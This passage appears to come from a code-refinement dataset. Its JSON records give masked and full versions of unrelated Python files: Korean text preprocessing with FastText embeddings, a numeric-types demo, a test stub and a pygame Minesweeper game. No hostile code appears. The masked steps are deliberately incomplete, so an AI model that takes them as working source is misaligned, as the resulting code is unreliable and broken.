[word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\ndef make_word_embedding(word_dict, word_emb_pkl_path=params[\n 'default_word_emb_pkl_path'], fasttext_path=params['default_fasttext_path']\n ):\n word_emb = np.zeros([len(word_dict), params['word_emb_dim']])\n if os.path.isfile(word_emb_pkl_path):\n with open(word_emb_pkl_path, 'rb') as f:\n word_emb = pickle.load(f)\n print('Existed trained word embedding loaded')\n else:\n fasttext_model = FastText.load_fasttext_format(fasttext_path,\n encoding='utf8')\n print('No word_emb pkl file, start making word_emb ...')\n for word, idx in word_dict.items():\n if idx == 0:\n continue\n else:\n try:\n word_emb[idx] = np.asarray(fasttext_model.wv[word])\n except KeyError:\n word_emb[idx] = np.random.uniform(-0.25, 0.25, params[\n 'word_emb_dim'])\n with open(word_emb_pkl_path, 'wb') as f:\n pickle.dump(word_emb, f)\n print('Making word_emb ... 
Done and Saved')\n return word_emb\n\n\ndef zero_padding(token_sentence, word_dict):\n padded_sentence = token_sentence + [word_dict[params['PAD']]] * (params\n ['max_seq_length'] - len(token_sentence))\n return padded_sentence\n\n\ndef dataset_iterator(filename, word_dict, batch_size):\n with open(filename, 'r', encoding='utf8') as f_dataset:\n context = []\n sequence_length = []\n label = []\n text = f_dataset.read().split('\\n')\n for line in text[1:]:\n class_label = [0, 0]\n review = line.split('\\t')[1]\n polarity = int(line.split('\\t')[2])\n class_label[polarity] = 1\n label.append(class_label)\n tokens = tokenizer.morphs(review)\n if len(tokens) > params['max_seq_length']:\n tokens = tokens[:params['max_seq_length']]\n sentence = [(word_dict[word] if word in word_dict else\n word_dict[params['UNK']]) for word in tokens]\n sequence_length.append(len(sentence))\n sentence = zero_padding(sentence, word_dict)\n context.append(sentence)\n if len(context) == batch_size:\n yield context, sequence_length, label\n context = []\n sequence_length = []\n label = []\n if len(context) > 0:\n yield context, sequence_length, label\n", "step-4": "import os\nimport os.path\nimport numpy as np\nimport pickle\nimport codecs\nfrom konlpy.tag import Okt\nfrom hyperparams import params\nfrom gensim.models import FastText\ntokenizer = Okt()\n\n\ndef make_word_dictionary(word_dict_pkl_path=params[\n 'default_word_dict_pkl_path'], training_data_path=params[\n 'default_training_data_path']):\n word_dict = dict()\n if os.path.isfile(word_dict_pkl_path):\n with open(word_dict_pkl_path, 'rb') as f:\n word_dict = pickle.load(f)\n print('Existed word_dict loaded')\n else:\n print('No word_dict pkl file, start making word_dict...')\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\n word_vocab = dict()\n for line in f.read().split('\\n')[1:]:\n review = line.split('\\t')[1]\n tokens = tokenizer.morphs(review)\n for token in tokens:\n if token in word_vocab.keys():\n 
word_vocab[token] += 1\n else:\n word_vocab[token] = 1\n word_vocab = [word for word in word_vocab.keys() if word_vocab[\n word] >= params['min_vocab_count']]\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\n for idx, word in enumerate(word_vocab):\n word_dict[word] = idx\n print('Making word_dict ... Done and Saved')\n with open(word_dict_pkl_path, 'wb') as f:\n pickle.dump(word_dict, f)\n return word_dict\n\n\ndef make_word_embedding(word_dict, word_emb_pkl_path=params[\n 'default_word_emb_pkl_path'], fasttext_path=params['default_fasttext_path']\n ):\n word_emb = np.zeros([len(word_dict), params['word_emb_dim']])\n if os.path.isfile(word_emb_pkl_path):\n with open(word_emb_pkl_path, 'rb') as f:\n word_emb = pickle.load(f)\n print('Existed trained word embedding loaded')\n else:\n fasttext_model = FastText.load_fasttext_format(fasttext_path,\n encoding='utf8')\n print('No word_emb pkl file, start making word_emb ...')\n for word, idx in word_dict.items():\n if idx == 0:\n continue\n else:\n try:\n word_emb[idx] = np.asarray(fasttext_model.wv[word])\n except KeyError:\n word_emb[idx] = np.random.uniform(-0.25, 0.25, params[\n 'word_emb_dim'])\n with open(word_emb_pkl_path, 'wb') as f:\n pickle.dump(word_emb, f)\n print('Making word_emb ... 
Done and Saved')\n return word_emb\n\n\ndef zero_padding(token_sentence, word_dict):\n padded_sentence = token_sentence + [word_dict[params['PAD']]] * (params\n ['max_seq_length'] - len(token_sentence))\n return padded_sentence\n\n\ndef dataset_iterator(filename, word_dict, batch_size):\n with open(filename, 'r', encoding='utf8') as f_dataset:\n context = []\n sequence_length = []\n label = []\n text = f_dataset.read().split('\\n')\n for line in text[1:]:\n class_label = [0, 0]\n review = line.split('\\t')[1]\n polarity = int(line.split('\\t')[2])\n class_label[polarity] = 1\n label.append(class_label)\n tokens = tokenizer.morphs(review)\n if len(tokens) > params['max_seq_length']:\n tokens = tokens[:params['max_seq_length']]\n sentence = [(word_dict[word] if word in word_dict else\n word_dict[params['UNK']]) for word in tokens]\n sequence_length.append(len(sentence))\n sentence = zero_padding(sentence, word_dict)\n context.append(sentence)\n if len(context) == batch_size:\n yield context, sequence_length, label\n context = []\n sequence_length = []\n label = []\n if len(context) > 0:\n yield context, sequence_length, label\n", "step-5": "import os\r\nimport os.path\r\nimport numpy as np\r\nimport pickle\r\nimport codecs\r\nfrom konlpy.tag import Okt\r\nfrom hyperparams import params\r\nfrom gensim.models import FastText\r\n\r\n#tokenizer\r\ntokenizer = Okt()\r\n\r\ndef make_word_dictionary(word_dict_pkl_path=params['default_word_dict_pkl_path'], training_data_path = params['default_training_data_path']):\r\n #word_dict => 'Word':'index'\r\n word_dict = dict()\r\n if os.path.isfile(word_dict_pkl_path):\r\n #if already existed, just load it\r\n with open(word_dict_pkl_path, 'rb') as f:\r\n word_dict = pickle.load(f)\r\n print('Existed word_dict loaded')\r\n else:\r\n print('No word_dict pkl file, start making word_dict...')\r\n with codecs.open(training_data_path, 'r', encoding='utf-8') as f:\r\n word_vocab = dict()\r\n # 'word':'frequency'\r\n for line in 
f.read().split('\\n')[1:]:\r\n review = line.split('\\t')[1]\r\n #tokenizing\r\n tokens = tokenizer.morphs(review)\r\n for token in tokens:\r\n if token in word_vocab.keys():\r\n word_vocab[token] += 1\r\n else:\r\n word_vocab[token] = 1\r\n word_vocab = [word for word in word_vocab.keys() if word_vocab[word] >= params['min_vocab_count']]\r\n # add pad & unk token\r\n word_vocab = [params['PAD']] + word_vocab + [params['UNK']]\r\n for idx, word in enumerate(word_vocab):\r\n word_dict[word] = idx\r\n print('Making word_dict ... Done and Saved')\r\n with open(word_dict_pkl_path, 'wb') as f:\r\n pickle.dump(word_dict, f)\r\n return word_dict\r\n\r\ndef make_word_embedding(word_dict, word_emb_pkl_path = params['default_word_emb_pkl_path'], fasttext_path = params['default_fasttext_path']):\r\n word_emb = np.zeros([len(word_dict), params['word_emb_dim']])\r\n if os.path.isfile(word_emb_pkl_path):\r\n with open(word_emb_pkl_path, 'rb') as f:\r\n word_emb = pickle.load(f)\r\n print('Existed trained word embedding loaded')\r\n else:\r\n #load fasttext model\r\n fasttext_model = FastText.load_fasttext_format(fasttext_path, encoding='utf8')\r\n print('No word_emb pkl file, start making word_emb ...')\r\n for word, idx in word_dict.items():\r\n if idx==0:\r\n # PAD = 0\r\n continue\r\n else:\r\n try:\r\n word_emb[idx] = np.asarray(fasttext_model.wv[word])\r\n except KeyError:\r\n # if there is no word vector for certain word, just assign random vector\r\n word_emb[idx] = np.random.uniform(-0.25, 0.25, params['word_emb_dim'])\r\n with open(word_emb_pkl_path, 'wb') as f:\r\n pickle.dump(word_emb, f)\r\n print('Making word_emb ... 
Done and Saved')\r\n return word_emb\r\n\r\ndef zero_padding(token_sentence, word_dict):\r\n #input : [1,4,3,2,1,15]\r\n #output : [1,4,3,2,1,15,0,0,0,0]\r\n padded_sentence = token_sentence + [word_dict[params['PAD']]]*(params['max_seq_length']-len(token_sentence))\r\n return padded_sentence\r\n\r\n\r\ndef dataset_iterator(filename, word_dict, batch_size):\r\n #yield batch for training\r\n with open(filename, 'r', encoding='utf8') as f_dataset:\r\n context = []\r\n sequence_length = []\r\n label = []\r\n text = f_dataset.read().split('\\n')\r\n for line in text[1:]:\r\n class_label = [0,0]\r\n review = line.split('\\t')[1]\r\n polarity = int(line.split('\\t')[2])\r\n class_label[polarity] = 1 #mark polarity\r\n label.append(class_label)\r\n tokens = tokenizer.morphs(review)\r\n #if the review is too long, cut it to adequate length\r\n if len(tokens) > params['max_seq_length']:\r\n tokens = tokens[:params['max_seq_length']]\r\n sentence = [word_dict[word] if word in word_dict else word_dict[params['UNK']] for word in tokens]\r\n sequence_length.append(len(sentence))\r\n sentence = zero_padding(sentence, word_dict)\r\n context.append(sentence)\r\n\r\n if len(context) == batch_size:\r\n yield (context, sequence_length, label)\r\n context =[]\r\n sequence_length = []\r\n label = []\r\n if len(context) > 0:\r\n yield (context, sequence_length, label)", "step-ids": [ 1, 3, 5, 6, 7 ] }
[ 1, 3, 5, 6, 7 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print('a is type:', type(a)) print('c is type:', type(c)) print('e is type:', type(e)) print(a + b) print(d / c) print(b / a) print(b // a) print(e) print(e + f) print(sys.float_info) <|reserved_special_token_1|> <|reserved_special_token_0|> a = 3 b = 4 c = 5.66 d = 8.0 e = complex(c, d) f = complex(float(a), float(b)) print('a is type:', type(a)) print('c is type:', type(c)) print('e is type:', type(e)) print(a + b) print(d / c) print(b / a) print(b // a) print(e) print(e + f) print(sys.float_info) <|reserved_special_token_1|> import sys a = 3 b = 4 c = 5.66 d = 8.0 e = complex(c, d) f = complex(float(a), float(b)) print('a is type:', type(a)) print('c is type:', type(c)) print('e is type:', type(e)) print(a + b) print(d / c) print(b / a) print(b // a) print(e) print(e + f) print(sys.float_info) <|reserved_special_token_1|> import sys a = 3 b = 4 c = 5.66 d = 8.0 e = complex(c,d) f = complex(float(a),float(b)) print("a is type:",type(a)) print("c is type:",type(c)) print("e is type:",type(e)) print(a + b) print(d / c) print(b / a) #2个除约成整型 print(b // a) print(e) print(e + f) print(sys.float_info)
flexible
{ "blob_id": "2876c9f8db0395143b165b855b22e364e3cc8121", "index": 9008, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('a is type:', type(a))\nprint('c is type:', type(c))\nprint('e is type:', type(e))\nprint(a + b)\nprint(d / c)\nprint(b / a)\nprint(b // a)\nprint(e)\nprint(e + f)\nprint(sys.float_info)\n", "step-3": "<mask token>\na = 3\nb = 4\nc = 5.66\nd = 8.0\ne = complex(c, d)\nf = complex(float(a), float(b))\nprint('a is type:', type(a))\nprint('c is type:', type(c))\nprint('e is type:', type(e))\nprint(a + b)\nprint(d / c)\nprint(b / a)\nprint(b // a)\nprint(e)\nprint(e + f)\nprint(sys.float_info)\n", "step-4": "import sys\na = 3\nb = 4\nc = 5.66\nd = 8.0\ne = complex(c, d)\nf = complex(float(a), float(b))\nprint('a is type:', type(a))\nprint('c is type:', type(c))\nprint('e is type:', type(e))\nprint(a + b)\nprint(d / c)\nprint(b / a)\nprint(b // a)\nprint(e)\nprint(e + f)\nprint(sys.float_info)\n", "step-5": "import sys\n\na = 3\nb = 4\n\nc = 5.66\nd = 8.0\n\ne = complex(c,d)\nf = complex(float(a),float(b))\n\nprint(\"a is type:\",type(a))\nprint(\"c is type:\",type(c))\nprint(\"e is type:\",type(e))\n\nprint(a + b)\nprint(d / c)\n\nprint(b / a)\n#2个除约成整型\nprint(b // a)\n\nprint(e)\nprint(e + f)\n\nprint(sys.float_info)", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def test_xyz123(): cone_x = bc.primitives.Cone(1.0, 1.0) <|reserved_special_token_1|> __author__ = 'jjpr' <|reserved_special_token_0|> def test_xyz123(): cone_x = bc.primitives.Cone(1.0, 1.0) <|reserved_special_token_1|> __author__ = 'jjpr' import pyrr import barleycorn as bc def test_xyz123(): cone_x = bc.primitives.Cone(1.0, 1.0)
flexible
{ "blob_id": "e6af221f1d6397d0fc52671cdd27d43549d0aecb", "index": 513, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n", "step-3": "__author__ = 'jjpr'\n<mask token>\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n", "step-4": "__author__ = 'jjpr'\nimport pyrr\nimport barleycorn as bc\n\n\ndef test_xyz123():\n cone_x = bc.primitives.Cone(1.0, 1.0)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Minesweeper clone built on pygame.
# A fixed GRID_WIDTH x GRID_HEIGHT board is drawn cell-by-cell; left click digs,
# right click cycles flag -> question mark -> blank. All layout values below are
# in pixels unless noted otherwise.

import sys
import random
import pygame
import pygame.locals
import time

# TODO high scores, difficulties

# Absolutes (in pixels where not otherwise stated)
CELL_SIDE_LENGTH = 40  # Side length of each cell
CELL_MARGIN = 2  # Gap between cells
GRID_HEIGHT = 10  # How many cells are in the grid
GRID_WIDTH = 10
X_BOARD_MARGIN = 50  # Gap between grid and sides of board
Y_BOARD_MARGIN = 75
MENU_MARGIN = 100  # Amount of space on the right dedicated to the menu
DIFFICULTY = 0.1  # Ratio of bombs (10% by default)
FPS = 30  # frames per second (window refresh speed)

# Relatives (so board size can easily be changed)
NUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY)  # Default about 10% of the board is mines
WINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT) + (CELL_MARGIN * GRID_HEIGHT) + (Y_BOARD_MARGIN * 2)
WINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH) + (CELL_MARGIN * GRID_WIDTH) + (X_BOARD_MARGIN * 2) + MENU_MARGIN

# R G B (not all used, but kept so theme can easily be changed)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
MIDGREEN = (40, 190, 40)
CYAN = (0, 255, 255)
BLUE = (0, 0, 255)
DARKBLUE = (20, 20, 60)
MAGENTA = (255, 0, 255)
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GRAY = (200, 200, 200)

BG_COLOR = DARKBLUE  # Background color
CELL_COLOR = GRAY  # Universal cover color
HIGHLIGHT_COLOR = CYAN  # Cell the cursor is currently hovering over
FLAG_COLOR = MIDGREEN

# Symbols: the first element of each board cell tuple is one of these (or a
# digit string "1".."8" for a numbered clear cell).
FLAG = 'flag'
MINE = 'mine'
CLEAR = 'clear'


class Game:
    """One Minesweeper session: owns the board state and the pygame window.

    Board representation: ``self.board[x][y]`` is a ``(shape, color)`` tuple
    where shape is MINE, CLEAR, or a digit string. Parallel 2-D boolean grids
    (``revealed_cells``, ``flags``, ``questionmarks``) track per-cell UI state.
    """

    def __init__(self):
        """Initialize pygame, open the window, and build a fresh board."""
        pygame.init()

        # CLOCK and SURFACE are shared as module-level globals so the drawing
        # helpers below can use them without passing the surface around.
        global CLOCK, SURFACE
        CLOCK = pygame.time.Clock()
        SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
        self.mouse_x = 0  # Stores x-coordinate of mouse event
        self.mouse_y = 0  # Stores y-coordinate of mouse event
        pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')
        self.board = self.get_board()
        self.revealed_cells = self.generate_data(False)
        self.flags = self.generate_data(False)
        self.questionmarks = self.generate_data(False)
        self.game_over = False
        # NOTE(review): Stopwatch is not defined in this part of the file —
        # presumably declared elsewhere in the module; confirm before moving code.
        self.timer = Stopwatch()
        SURFACE.fill(BG_COLOR)

    def main(self):
        """Run the main event/draw loop; never returns (quits via sys.exit)."""
        while True:
            left_click = False
            right_click = False
            SURFACE.fill(BG_COLOR)
            self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)
            self.create_menu()

            font = pygame.font.SysFont("times new roman", 25)

            # Timer (will be used to implement high scores)
            self.timer.start()
            t1 = self.timer.get_seconds()
            label = font.render(str(t1), 1, MAGENTA)
            SURFACE.blit(label, (50, 50))

            # Mouse event handling
            for event in pygame.event.get():
                if event.type == pygame.locals.QUIT:
                    pygame.quit()
                    sys.exit()  # Even if the window closes, we still need to manually stop the processes
                elif event.type == pygame.locals.MOUSEMOTION:
                    self.mouse_x, self.mouse_y = event.pos  # For hovering info
                elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:  # Left click
                    self.mouse_x, self.mouse_y = event.pos
                    print(self.mouse_x, self.mouse_y)
                    left_click = True
                elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:  # Right click
                    self.mouse_x, self.mouse_y = event.pos
                    right_click = True

            # If user decided to start over, reinitialize game
            if self.game_over and right_click:
                self.board = self.get_board()
                self.revealed_cells = self.generate_data(False)
                self.flags = self.generate_data(False)
                self.questionmarks = self.generate_data(False)
                self.game_over = False
                self.timer = Stopwatch()
                right_click = False

            # TODO tweak spacing on text
            # NOTE(review): 'win' is only assigned at the bottom of this loop;
            # this branch is safe on the first iteration only because
            # game_over starts False, so 'win' is defined before first use here.
            if self.game_over:
                self.timer.pause()
                score = self.timer.get_seconds()
                a_x = X_BOARD_MARGIN + ((GRID_WIDTH / 4) * CELL_SIDE_LENGTH)
                b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN)
                font = pygame.font.SysFont("times new roman", 25)
                if win:
                    label = font.render('Congratulations, you won!', 1, GREEN)
                    SURFACE.blit(label, (a_x - 75, b_y))
                    label = font.render('Score: ' + str(score), 1, GREEN)
                    SURFACE.blit(label, (a_x + 200, b_y))
                else:
                    label = font.render('GAME OVER', 1, RED)
                    SURFACE.blit(label, (a_x + 10, b_y))
                label = font.render('Press RIGHT mouse button', 1, YELLOW)
                SURFACE.blit(label, (a_x - 50, b_y + 25))

            cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)
            if cell_x is not None and cell_y is not None:  # If mouse is hovering over a cell during mouse event

                # Highlight cell
                if not self.revealed_cells[cell_x][cell_y] and not self.game_over:
                    self.highlight_cell(cell_x, cell_y)

                # Digging somewhere
                if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over:

                    # So you can't accidentally click a flagged/question mark space
                    if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]:
                        # Redundant in this branch (flag is already False), kept as-is
                        self.flags[cell_x][cell_y] = False

                        if self.board[cell_x][cell_y][0] == MINE:  # If you dig a mine, reveal all cells & game over
                            self.revealed_cells = self.generate_data(True)
                            self.game_over = True
                        elif self.board[cell_x][cell_y][0] == CLEAR:  # If you dig a clear cell, reveal that cell
                            self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks)
                        else:
                            self.revealed_cells[cell_x][cell_y] = True  # Set the cell as revealed

                        # Redraw board after mouse event
                        self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)

                # Placing a flag- if flag already there, change flag to question mark.
                # If question mark already there, turn to nothing. If nothing there, turn on flag
                if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over:
                    if self.flags[cell_x][cell_y]:
                        self.flags[cell_x][cell_y] = False
                        self.questionmarks[cell_x][cell_y] = True
                    elif self.questionmarks[cell_x][cell_y]:
                        self.questionmarks[cell_x][cell_y] = False
                        self.flags[cell_x][cell_y] = False
                    else:
                        self.flags[cell_x][cell_y] = True
                        self.questionmarks[cell_x][cell_y] = False

                    # Flag is drawn in this method call
                    self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)

            # This block decides whether or not the player has won yet after a mouse event
            win = True
            for x in range(GRID_WIDTH):  # If a cell is a mine and not flagged, or if a cell is clear
                for y in range(GRID_HEIGHT):  # but not revealed, then the game is not yet over
                    if (self.board[x][y][0] == MINE and not self.flags[x][y]) or (
                            self.board[x][y][0] != MINE and not self.revealed_cells[x][y]):
                        win = False
            if win:
                self.game_over = True

            # Redraw the screen and wait for clock tick
            pygame.display.update()
            CLOCK.tick(FPS)

    @staticmethod
    def get_board():
        """Build and return a fresh board as a GRID_WIDTH x GRID_HEIGHT grid.

        Each cell is a (shape, color) tuple: mines first (NUM_MINES of them),
        the rest clear; the list is shuffled, laid out column-by-column, and
        then every clear cell adjacent to mines gets its digit string.
        """
        icons = []
        mines = 0

        # Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay
        # Making randomized array
        for x in range(GRID_WIDTH):
            for y in range(GRID_HEIGHT):
                if mines < NUM_MINES:
                    icons.append((MINE, RED))
                    mines += 1
                else:
                    icons.append((CLEAR, WHITE))
        random.shuffle(icons)

        # Create static under-board
        board = []
        for x in range(GRID_WIDTH):
            column = []
            for y in range(GRID_HEIGHT):
                column.append(icons[0])
                del icons[0]  # so the next icon[0] is the one after this
            board.append(column)

        # This block determines how many mines are around each cell, and adds the number to the board's array
        for x in range(GRID_WIDTH):
            for y in range(GRID_HEIGHT):
                mines = 0  # reused here as the neighbor-mine counter
                if x > 0:
                    if y > 0:  # If not on the left edge AND not on top edge
                        if board[x - 1][y - 1][0] == MINE:
                            mines += 1
                    if board[x - 1][y][0] == MINE:
                        mines += 1
                    if y < GRID_HEIGHT - 1:
                        if board[x - 1][y + 1][0] == MINE:
                            mines += 1
                if x < GRID_WIDTH - 1:
                    if y > 0:  # If not on right edge AND not on top edge
                        if board[x + 1][y - 1][0] == MINE:
                            mines += 1
                    if board[x + 1][y][0] == MINE:
                        mines += 1
                    if y < GRID_HEIGHT - 1:
                        if board[x + 1][y + 1][0] == MINE:
                            mines += 1
                if y > 0:  # If not on right or left edge AND not on top edge
                    if board[x][y - 1][0] == MINE:
                        mines += 1
                if y < GRID_HEIGHT - 1:  # If not on right or left edge AND on bottom edge
                    if board[x][y + 1][0] == MINE:
                        mines += 1

                # If the cell is clear and there are mines around it, add the number of mines to board array
                if board[x][y][0] != MINE:
                    if mines in range(1, 9):
                        board[x][y] = (str(mines), WHITE)
        return board

    # Used to show full board on game over & reset board on game start
    @staticmethod
    def generate_data(val):
        """Return a GRID_WIDTH x GRID_HEIGHT grid with every cell set to val."""
        clear = []
        for i in range(GRID_WIDTH):
            clear.append([val] * GRID_HEIGHT)
        return clear

    # Convert row, column coordinates into x, y pixel coordinates (for drawing shapes)
    @staticmethod
    def get_top_left_coordinates(row, column):
        """Return the (left, top) pixel of the cell at grid (row, column)."""
        left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN
        top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN
        return left, top

    # Convert x, y pixel coordinates to row, column coordinates (for mouse hovering)
    def get_cell_at_pixel(self, x, y):
        """Return the (cell_x, cell_y) under pixel (x, y), or (None, None)."""
        for cell_x in range(GRID_WIDTH):
            for cell_y in range(GRID_HEIGHT):
                left, top = self.get_top_left_coordinates(cell_x, cell_y)
                cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)
                if cell_rect.collidepoint(x, y):  # If currently hovering over a cell
                    return cell_x, cell_y
        return None, None  # If not currently hovering over a cell

    # Redraws board after mouse event
    def draw_board(self, board, revealed, flags, questionmarks):
        """Draw every cell: covers/flags/question marks for hidden cells,
        the underlying icon for revealed ones."""
        for cell_x in range(GRID_WIDTH):
            for cell_y in range(GRID_HEIGHT):
                left, top = self.get_top_left_coordinates(cell_x, cell_y)

                # Symbols not added on board creation must be drawn here: "unrevealed" boxes, flags, and question marks
                if not revealed[cell_x][cell_y]:

                    # Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value
                    pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))

                    if flags[cell_x][cell_y]:
                        half = int(CELL_SIDE_LENGTH * 0.5)  # Relative point halfway through cell

                        # top point, bottom left point, bottom right point
                        pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top),
                                                                  (left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2),
                                                                  (left + CELL_SIDE_LENGTH - CELL_MARGIN/2,
                                                                   top + CELL_SIDE_LENGTH - CELL_MARGIN/2)])
                    elif questionmarks[cell_x][cell_y]:
                        quarter = int(CELL_SIDE_LENGTH * 0.25)
                        pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
                        fontsize = int(CELL_SIDE_LENGTH)
                        font = pygame.font.SysFont("times new roman", fontsize)
                        label = font.render("?", 1, BLACK)
                        SURFACE.blit(label, (left + quarter, top))
                else:
                    # Draw revealed cells
                    shape, color = self.get_shape_and_color(board, cell_x, cell_y)
                    self.draw_icon(shape, color, cell_x, cell_y)

    # Draws icon passed to it in the stated cell
    def draw_icon(self, shape, color, cell_x, cell_y):
        """Draw one revealed cell: a rect for CLEAR, an ellipse for MINE,
        otherwise a rect with the digit string rendered on top."""

        # Relative point of quarter-way through cell
        quarter = int(CELL_SIDE_LENGTH * 0.25)
        left, top = self.get_top_left_coordinates(cell_x, cell_y)  # Drawing of all images starts at top left corner

        # Draw the shapes
        if shape == CLEAR:
            pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
        elif shape == MINE:
            pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))

        # Flag shape & question mark in draw_board because they are activated via mouse event
        else:  # Clear with num
            pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
            fontsize = int(CELL_SIDE_LENGTH)
            font = pygame.font.SysFont("times new roman", fontsize)
            label = font.render(shape, 1, BLACK)  # a cell with number corresponds to shapes "1", "2", etc.
            SURFACE.blit(label, (left + quarter, top))

    # Returns the shape and color of icon to be created in draw_icon method
    @staticmethod
    def get_shape_and_color(board, cell_x, cell_y):
        # shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1]
        return board[cell_x][cell_y][0], board[cell_x][cell_y][1]

    # Draws a box around the cell the mouse is hovering over, 'highlighting' it
    def highlight_cell(self, cell_x, cell_y):
        """Outline the hovered cell; the outline sits in the margin gap."""
        left, top = self.get_top_left_coordinates(cell_x, cell_y)

        # Changes with cell size, but line width is hard-set at 2px (last argument)
        pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2),
                                                    CELL_SIDE_LENGTH + CELL_MARGIN,
                                                    CELL_SIDE_LENGTH + CELL_MARGIN), 2)

    # Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.)
    def reveal_cells(self, x, y, board, revealed, flags, questionmarks):
        """Flood-fill reveal starting at (x, y), recursing through CLEAR cells.

        Mutates ``revealed`` in place; stops at flagged cells, already-revealed
        cells, and numbered cells (which are revealed but not recursed through).
        """
        if revealed[x][y]:  # If the cell is already revealed, do nothing
            return
        if flags[x][y]:  # If the cell already has a flag on it, do nothing
            return
        revealed[x][y] = True
        if board[x][y][0] != CLEAR:
            return
        # Recurse into all existing neighbors (edge checks guard the borders)
        if x > 0:
            if y > 0:
                self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks)
            self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)
            if y < GRID_HEIGHT - 1:
                self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks)
        if x < GRID_WIDTH - 1:
            if y > 0:
                self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks)
            self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)
            if y < GRID_HEIGHT - 1:
                self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks)
        if y > 0:
            self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)
        if y < GRID_HEIGHT - 1:
            self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)

    @staticmethod
    def create_menu():
        font = pygame.font.SysFont("times new roman", 20)
        label = font.render(" High scores", 1, BLACK)
        pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))  # view high scores
SURFACE.blit(label, (500, 135)) class Stopwatch: def __init__(self): self.seconds = 0 self.running = False self.latest_time = None def start(self): if not self.running: self.running = True self.latest_time = time.time() def get_seconds(self): t1 = self.seconds if self.running: t1 += time.time() - self.latest_time return int(t1) def pause(self): if self.running: self.running = False self.seconds += time.time() - self.latest_time g = Game() g.main()
normal
{ "blob_id": "030bc0c7bdbbb09f722ffe4c82866726062f5317", "index": 1962, "step-1": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n <mask token>\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n <mask token>\n <mask token>\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, 